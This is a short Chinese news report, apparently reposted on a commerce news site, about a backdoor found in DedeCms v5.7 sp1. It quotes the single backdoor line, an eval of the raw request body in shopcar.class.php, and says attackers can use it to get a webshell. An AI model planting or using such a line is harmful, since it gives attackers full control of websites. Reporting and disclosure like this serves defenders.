您现在所在的位置:主页 > 工具 >
传织梦CMS系统被植入后门
发布日期:2022-04-27 10:42   来源:未知   阅读:

  据消息人士对DoNews透露,PHP开源网站管理系统织梦CMS(DedeCms)v5.7 sp1版本被植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。

  3月22日消息 据消息人士对DoNews透露,PHP开源网站管理系统织梦CMS(DedeCms)v5.7 sp1版本被植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。

  据悉,织梦CMS(Dedecms)v5.7 sp1版本的中的shopcar。class。php文件被植入一句后门代码“@eval(file_get_contents(‘php://input’));”。通过利用该后门,黑客只需构造简单的数据包提交到服务器,就能获取到该网站的WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限。

  另据CMS官方数据显示,目前约有70万网站使用该系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。

  【版权提示】亿邦动力倡导尊重与保护知识产权。未经许可,任何人不得复制、转载、或以其他方式使用本网站的内容。如发现本站文章存在版权问题,烦请提供版权疑问、身份证明、版权证明、联系方式等发邮件至,我们将及时沟通与处理。

  每日报告分享,权威报告发布,直播带货、私域流量、跨境电商、DTC…行业干货、数据研报、趋势报告…

  摩根士丹利董事总经理季卫东表示,互联网行业竞争最激烈,每年自然死亡率高达30%,但中国媒体消费还有巨大上升空间。说到定价权除了我前面讲的商业模式、核心竞争力,还有你的品牌建设,往往一个好的品牌会为你带来定价权,会降低消费者的消费敏感度。